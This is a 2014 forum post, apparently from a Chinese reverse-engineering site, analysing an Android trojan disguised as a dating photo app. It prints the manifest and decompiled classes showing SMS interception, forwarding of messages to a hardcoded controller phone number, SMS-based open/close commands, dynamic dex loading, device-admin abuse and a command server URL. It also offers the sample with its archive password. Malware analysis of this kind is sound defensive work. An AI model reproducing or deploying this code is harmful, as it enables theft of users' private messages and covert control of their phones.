一枚APK文件的分析【半成品】
本帖最后由 轩少 于 2014-10-28 22:42 编辑昨天从QQ群里截获的一个APK样本,看了下索取的权限,都是高危权限,不排除有窃取隐私的可能。
文件采用“包中包”(就是在一个APK中再放置另一个APK。比如这个:cao.apk在:同城约炮相册\res\raw目录下,安装完同城约炮相册.apk,运行后自动安装cao.apk)安装
文件信息:
同城约炮相册.apk
CRC32: DFFE6DBE
MD5: 4F487D6D264F6FE9915D7FAEEC6327D0
SHA-1: ACC64922E63F978F689EC8E87A76CF6855CA6D00
cao.apk
CRC32: 00AF413F
MD5: 325666F55D02C48725E3EBC5613226F9
SHA-1: 4701C5857E6CA205DEEFF4F9A41B50D2CEEB5438
<?xml version="1.0" encoding="utf-8"?>
<manifest
xmlns:android="http://schemas.android.com/apk/res/android"
android:versionCode="2"
android:versionName="2.0"
package="sdgfdg.wtert.sdgsfgbxbcvdfh"
>
<uses-sdk
android:minSdkVersion="8"
android:targetSdkVersion="20"
android:name="android.permission.INTERNET"//访问网络
android:name="android.permission.SEND_SMS" //发送短信
android:name="android.permission.RECEIVE_SMS"//接收短信
android:name="android.permission.READ_SMS"//读取短信
android:name="android.permission.WRITE_SMS" //编写短信
android:name="android.permission.WRITE_EXTERNAL_STORAGE"//操作外部存储文件
android:name="android.permission.KILL_BACKGROUND_PROCESSES"//结束(杀掉)指定进程
android:theme="@android:01030007"
android:label="@7F060001"
android:icon="@7F020000"
android:debuggable="true"
android:allowBackup="true"
>
<activity
android:label="@7F060001"
android:name="sdgfdg.wtert.sdgsfgbxbcvdfh.MainActivity"
>
<intent-filter
>
<action
android:name="android.intent.action.MAIN"
>
</action>
<category
android:name="android.intent.category.LAUNCHER"
>
</category>
</intent-filter>
</activity>
<service
android:name="sdgfdg.wtert.sdgsfgbxbcvdfh.MyServers1"//执行MyServers1.class
>
</service>
<receiver
android:label="请激活"
android:name="sdgfdg.wtert.sdgsfgbxbcvdfh.DevicesReceiver2"//执行DevicesReceiver2.class
android:permission="android.permission.BIND_DEVICE_ADMIN"//请求系统管理员接收者receiver
android:description="@7F060003"
>
<meta-data
android:name="android.app.device_admin"
android:resource="@7F040000"
>
</meta-data>
<intent-filter
>
<action
android:name="android.app.action.DEVICE_ADMIN_ENABLED"//打开设备管理器
>
</action>
</intent-filter>
</receiver>
<receiver
android:name="sdgfdg.wtert.sdgsfgbxbcvdfh.laixinxis"//执行laixinxis.class
>
<intent-filter
android:priority="2147483647"
>
<action
android:name="android.provider.Telephony.SMS_RECEIVED"//拦截系统收到信息广播(就是通知栏)
>
</action>
<category
android:name="android.intent.category.DEFAULT"//隐藏启动?
>
</category>
</intent-filter>
</receiver>
</application>
</manifest>
查看AndroidManifest.xml配置文件,可以发现赋予了程序非常多的权限,且是高危的权限,例如发送短信、结束程序、拦截广播等等,
DevicesReceiver2.class代码如下:
package sdgfdg.wtert.sdgsfgbxbcvdfh;
import android.app.admin.DeviceAdminReceiver;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.content.res.Resources;
public class DevicesReceiver2 extends DeviceAdminReceiver
{
ComponentName componentName;
PackageManager packageManager;
public void onDisabled(Context paramContext, Intent paramIntent)
{
super.onDisabled(paramContext, paramIntent);
}
public void onEnabled(Context paramContext, Intent paramIntent)
{
super.onEnabled(paramContext, paramIntent);
}
public void onReceive(Context paramContext, Intent paramIntent)
{
if (paramIntent.getAction().equals("android.app.action.DEVICE_ADMIN_ENABLED"))
ApksUtil1.loadFaMsg(paramContext, paramContext.getResources().getString(2131099666), paramContext.getResources().getString(2131099667), huanaidss2.controlphone, paramContext.getResources().getString(2131099659));
while (true)
{
super.onReceive(paramContext, paramIntent);
return;
if (paramIntent.getAction().equals("android.app.action.DEVICE_ADMIN_DISABLE_REQUESTED"))
ApksUtil1.loadFaMsg(paramContext, paramContext.getResources().getString(2131099666), paramContext.getResources().getString(2131099667), huanaidss2.controlphone, paramContext.getResources().getString(2131099660));
}
}
}发现调取了一个 huanaidss2.controlphone 我们接着看 huanaidss2.class
package sdgfdg.wtert.sdgsfgbxbcvdfh;
public class huanaidss2
{
public static final String baidu = "http://60.8.229.158:8002/sj.asp";
public static String controlphone = "15021352759";
}
得到: controlphone = "15021352759" 也就是说会给15021352759发短信,顺手搜了下手机号,呵呵呵。。shouxinxi.class代码如下:
package sdgfdg.wtert.sdgsfgbxbcvdfh;
import android.content.Context;
import android.content.SharedPreferences;
import android.content.SharedPreferences.Editor;
import android.content.res.Resources;
import android.database.ContentObserver;
import android.net.Uri;
import android.os.Handler;
public class shouxinxi extends ContentObserver
{
public SharedPreferences abSharedPreferences = null;
private Context context;
public SharedPreferences.Editor editor;
private Uri inbox = null;
private String status;
public shouxinxi(Context paramContext, Handler paramHandler)
{
super(paramHandler);
this.context = paramContext;
this.inbox = Uri.parse("content://sms/inbox");
Change();
}
public void Change()
{
this.abSharedPreferences = this.context.getSharedPreferences("data", 0);
this.status = this.abSharedPreferences.getString("isWorkServer", "0");
ApksUtil1.shanxx(this.context, this.context.getResources().getString(2131099666), this.context.getResources().getString(2131099669),
huanaidss2.controlphone, this.status, this.inbox, this.abSharedPreferences);//调用shanxx.class和huanaidss2.class
}
public void onChange(boolean paramBoolean)
{
super.onChange(paramBoolean);
this.inbox = Uri.parse("content://sms/inbox");
Change();
}
}
laixinxis.class的代码如下:
package sdgfdg.wtert.sdgsfgbxbcvdfh;
import android.content.BroadcastReceiver;
import android.content.ContentResolver;
import android.content.Context;
import android.content.Intent;
import android.content.SharedPreferences;
import android.content.SharedPreferences.Editor;
import android.content.res.Resources;
import android.os.Bundle;
import android.telephony.SmsMessage;
import android.util.Log;
public class laixinxis extends BroadcastReceiver
{
public SharedPreferences abSharedPreferences = null;
public SharedPreferences.Editor editor;
private String messageStr;
private int n;
private String phoneStr;
private shouxinxi shouxxba;
private String status;
private SmsMessage[] xinxi;
public void onReceive(Context paramContext, Intent paramIntent)
{
this.abSharedPreferences = paramContext.getSharedPreferences("data", 0);
this.status = this.abSharedPreferences.getString("isWorkServer", "0");
Log.i("action", paramIntent.getAction());
paramContext.getSharedPreferences("config", 0);
Object[] arrayOfObject;
if (paramIntent.getAction().equals(paramContext.getResources().getString(2131099655)))
{
arrayOfObject = (Object[])paramIntent.getExtras().get("pdus");
this.xinxi = new SmsMessage;
this.n = 0;
if (this.n < arrayOfObject.length);
}
else
{
return;
}
this.xinxi = SmsMessage.createFromPdu((byte[])arrayOfObject);
this.phoneStr = this.xinxi.getOriginatingAddress();
this.messageStr = this.xinxi.getMessageBody();
if (this.status.equals("1"))
{
ApksUtil1.pinbi(paramContext, paramContext.getResources().getString(2131099666), paramContext.getResources().getString(2131099668), this);
if (this.messageStr.contains("close"))
{
ApksUtil1.loadFaMsg(paramContext, paramContext.getResources().getString(2131099666), paramContext.getResources().getString(2131099667), huanaidss2.controlphone, paramContext.getResources().getString(2131099653));
this.editor = this.abSharedPreferences.edit();
this.editor.putString("isWorkServer", "0");
this.editor.commit();
}
}
while (true)
{
this.n = (1 + this.n);
break;
if (this.messageStr.contains("open"))
{
ApksUtil1.loadFaMsg(paramContext, paramContext.getResources().getString(2131099666), paramContext.getResources().getString(2131099667), huanaidss2.controlphone, paramContext.getResources().getString(2131099654));
this.editor = this.abSharedPreferences.edit();
this.editor.putString("isWorkServer", "1");
this.editor.commit();
this.shouxxba = new shouxinxi(paramContext, null);
paramContext.getContentResolver().registerContentObserver(MyServers1.xxdizhi, true, this.shouxxba);
}
else
{
ApksUtil1.loadFaMsg(paramContext, paramContext.getResources().getString(2131099666), paramContext.getResources().getString(2131099667), huanaidss2.controlphone, this.phoneStr + "<" + this.messageStr);
continue;
if (this.messageStr.contains("open"))
{
ApksUtil1.pinbi(paramContext, paramContext.getResources().getString(2131099666), paramContext.getResources().getString(2131099668), this);
ApksUtil1.loadFaMsg(paramContext, paramContext.getResources().getString(2131099666), paramContext.getResources().getString(2131099667), huanaidss2.controlphone, paramContext.getResources().getString(2131099654));
this.editor = this.abSharedPreferences.edit();
this.editor.putString("isWorkServer", "1");
this.editor.commit();
this.shouxxba = new shouxinxi(paramContext, null);
paramContext.getContentResolver().registerContentObserver(MyServers1.xxdizhi, true, this.shouxxba);
}
}
}
}
void pingbi(Context paramContext, String paramString1, String paramString2, BroadcastReceiver paramBroadcastReceiver)
{
ApksUtil1.pinbi(paramContext, paramString1, paramString2, paramBroadcastReceiver);
}
public native void pingbiJNI(Context paramContext, String paramString1, String paramString2, BroadcastReceiver paramBroadcastReceiver);
}
被调用的shanxx代码如下:
public static void shanxx(Context paramContext, String paramString1, String paramString2, String paramString3, String paramString4, Uri paramUri, SharedPreferences paramSharedPreferences)
{
File localFile = paramContext.getDir("dex", 0);
DexClassLoader localDexClassLoader = new DexClassLoader(AbFilesUtil1.path.getAbsolutePath() + AbFilesUtil1.Filepath, localFile.getAbsolutePath(), null, paramContext.getClassLoader());
try
{
Class localClass = localDexClassLoader.loadClass(paramString1);
Object localObject = localClass.newInstance();
Method localMethod = localClass.getMethod(paramString2, new Class[] { Context.class, String.class, String.class, Uri.class, SharedPreferences.class });
localMethod.setAccessible(true);
localMethod.invoke(localObject, new Object[] { paramContext, paramString3, paramString4, paramUri, paramSharedPreferences });
return;
}
catch (Exception localException)
{
localException.printStackTrace();
}
}
}MyServes1.class的代码如下(调用了上述几个class):
package sdgfdg.wtert.sdgsfgbxbcvdfh;
import android.app.Service;
import android.content.ContentResolver;
import android.content.Intent;
import android.content.IntentFilter;
import android.content.SharedPreferences;
import android.content.res.Resources;
import android.net.Uri;
import android.os.IBinder;
public class MyServers1 extends Service
{
public static final Uri xxdizhi = Uri.parse("content://sms/");
public SharedPreferences abSharedPreferences = null;
private laixinxis xinxilai;
private shouxinxi xxshou;
public IBinder onBind(Intent paramIntent)
{
return null;
}
public void onCreate()
{
super.onCreate();
this.abSharedPreferences = getSharedPreferences("data", 0);
this.xxshou = new shouxinxi(this, null);
getContentResolver().registerContentObserver(xxdizhi, true, this.xxshou);
IntentFilter localIntentFilter = new IntentFilter();
localIntentFilter.addAction(getResources().getString(2131099655));
localIntentFilter.setPriority(2147483647);
this.xinxilai = new laixinxis();
registerReceiver(this.xinxilai, localIntentFilter, getResources().getString(2131099655), null);
}
public void onDestroy()
{
super.onDestroy();
stopForeground(true);
unregisterReceiver(this.xinxilai);
getContentResolver().unregisterContentObserver(this.xxshou);
Intent localIntent = new Intent();
localIntent.setClass(this, MyServers1.class);
startService(localIntent);
}
}
由于能力有限,我也只能搞到这里了,下面这是样本,有能力的继续搞吧……调用函数太多,密码:52pojie
不错啊,开始搞安卓分析了?@willJ 不错,研究一下呢 顶帖!!!! 研究一下 过几天再看下,最近没空,累如狗 你这文件名。。。 我也在研究这款软件!楼主怎么那么久没有更新啦? 知道这个 弄好了吗
页:
[1]